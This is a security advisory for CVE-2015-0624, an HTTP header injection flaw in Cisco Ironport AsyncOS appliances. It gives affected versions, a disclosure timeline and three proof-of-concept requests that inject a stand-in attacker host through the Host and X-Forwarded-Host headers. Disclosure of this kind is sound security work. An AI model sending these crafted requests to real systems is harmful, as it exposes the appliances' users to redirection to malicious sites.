Cisco Ironport AsyncOS suffers from an HTTP header injection vulnerability.
Cisco Ironport AsyncOS HTTP Header Injection
Vendor: Cisco
Product webpage: http://www.cisco.com
Affected version(s):
Cisco Ironport ESA - AsyncOS 8.0.1-023
Cisco Ironport WSA - AsyncOS 8.5.5-021
Cisco Ironport SMA - AsyncOS 8.4.0-138
Date: 24/02/2015
Credits: Glafkos Charalambous
CVE: CVE-2015-0624
Disclosure Timeline:
28-10-2014: Vendor Notification
28-10-2014: Vendor Response/Feedback
22-01-2015: Vendor Fix/Patch
20-02-2015: Vendor Advisory Release
24-02-2015: Public Disclosure
Description:
Cisco AsyncOS is vulnerable to unauthenticated HTTP Header Injection, caused by improper validation
of user supplied input when handling HTTP Host and X-Forwarded-Host request headers.
An attacker is able to inject crafted HTTP headers that could cause a web page redirection to a
malicious website.
PoC #1
GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Content-Length: 0
Host: ironport:8443:@[attacker.com]
PoC #2
GET https://ironport:8443/network/wga_ip_interfaces HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Content-Length: 0
Host: [attacker.com]
PoC #3
GET https://ironport:8443/monitor/wsa_user_report HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
DNT: 1
Cookie: sid=jdLIhsguH36OUkUZqSpn; authenticated=pME7nskMH6zQ6JmonjZd
Connection: keep-alive
Host: ironport:8443
X-Forwarded-Host: [attacker.com]
References:
http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2015-0624
# 0day.today [2018-01-01] #